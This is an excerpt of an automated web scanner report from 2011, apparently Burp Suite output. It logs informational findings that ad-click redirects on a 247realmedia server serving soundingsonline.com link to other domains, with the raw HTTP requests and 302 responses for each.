Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.376. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:10:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
